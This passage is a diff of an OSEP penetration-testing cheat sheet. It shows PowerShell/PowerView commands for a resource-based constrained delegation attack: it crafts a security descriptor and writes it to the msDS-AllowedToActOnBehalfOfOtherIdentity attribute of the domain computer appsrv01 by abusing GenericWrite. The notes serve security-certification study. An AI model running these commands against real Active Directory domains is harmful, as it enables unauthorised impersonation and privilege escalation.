peterkhe1999/CheatSheet/OSEP/README.md

 $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($sid))"
 ```

-With the SecurityDescriptor object created, we must convert it into a byte array to match the format for the msDS-AllowedToActOnBehalfOfOtherIdentity property:
+Convert it into a byte array to match the format for the msDS-AllowedToActOnBehalfOfOtherIdentity property:

 ```pwsh
 $SDbytes = New-Object byte[] ($SD.BinaryLength)
 $SD.GetBinaryForm($SDbytes,0)
 ```

-Obtain a handle to the computer object for appsrv01 and then pipe that into Set-DomainObject, which can update properties by specifying them with -Set options (Setting msds-allowedtoactonbehalfofotheridentity)
+Obtain a handle to the computer object for appsrv01 and then pipe that into **Set-DomainObject**, which can update properties by specifying them with -Set options.

 ```pwsh
 Get-DomainComputer -Identity appsrv01 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
 ```

-Since our dave user has the GenericWrite access right to appsrv01, we can set this property.
+Since our dave user has the **GenericWrite** access right to appsrv01, we can set this property.

-We can also use this attack vector with GenericAll, WriteProperty, or WriteDACL access rights to appsrv01.
+We can also use this attack vector with **GenericAll**, **WriteProperty**, or **WriteDACL** access rights to appsrv01.

 After writing the SecurityDescriptor to the property field, we should verify it